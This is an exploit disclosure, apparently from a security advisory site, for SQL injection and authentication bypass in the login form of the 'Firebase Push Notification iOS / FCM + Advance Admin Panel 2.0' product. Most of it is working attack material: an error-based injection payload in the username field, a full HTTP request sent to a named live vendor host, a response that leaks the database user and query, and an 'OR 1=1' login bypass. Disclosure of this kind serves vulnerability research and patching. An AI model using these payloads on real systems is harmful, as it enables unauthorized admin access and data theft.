Firebase Push Notification iOS / FCM + Advance Admin Panel 2.0 SQL injection / Authentication bypass

2018-07-09 / 2018-07-08
Credit: L0RD
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Firebase Push Notification iOS / FCM + Advance Admin Panel 2.0 - 'username' SQL injection / Authentication bypass # Date: 2018-07-08 # Exploit Author: L0RD # Email: borna.nematzadeh123@gmail.com # Vendor Homepage: https://codecanyon.net/item/firebase-push-notification-ios-fcm-advance-admin-panel/18600448?s_rank=19 # Version: 2.0 # Tested on: Win 10 ================================================= # POC : # vulnerable parameter : username # payload : 1') AND extractvalue(1,concat(0x3a,user(),0x3a))# # Request : ============== POST /advance_push/public/login HTTP/1.1 Host: www.icanstudioz.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 117 Connection: keep-alive Upgrade-Insecure-Requests: 1 _token=ITG4QVFxob9066DAIbRm7pZ5UrFZAbN9eEQOyaVU&username=1') AND extractvalue(1,concat(0x3a,user(),0x3a))#&password=1 # Response : =============== HTTP/1.1 500 Internal Server Error Date: Fri, 06 Jul 2018 15:28:25 GMT Server: Apache Cache-Control: no-cache, private Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 46984 title="Illuminate\Database\QueryException">QueryException</abbr> in <a title="/home/icanstud/public_html/advance_push/vendor/laravel/framework/src/Illuminate/Database/Connection.php line 651" ondblclick="var f=this.innerHTML;this.innerHTML=this.title;this.title=f;">Connection.php line 651</a>:</span> <span class="exception_message"> SQLSTATE[HY000]: General error: 1105 XPATH syntax error: &#039;:icanstud_icanstu@localhost:&#039; (SQL: select * from admin where (username = &#039;1&#039;) AND extractvalue(1,concat(0x3a,user(),0x3a))#&#039; OR email = &#039;1&#039;) AND extractvalue(1,concat(0x3a,user(),0x3a))#&#039;) and password = md5(&#039;1&#039;)) ============================================= 2) Authentication bypass : # Query : ('select * from admin where (username = '' OR email = '') and password = md5('')) # Payload : x' OR 1=1)# # Username : x' OR 1=1)# # Password : anything =============================================


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top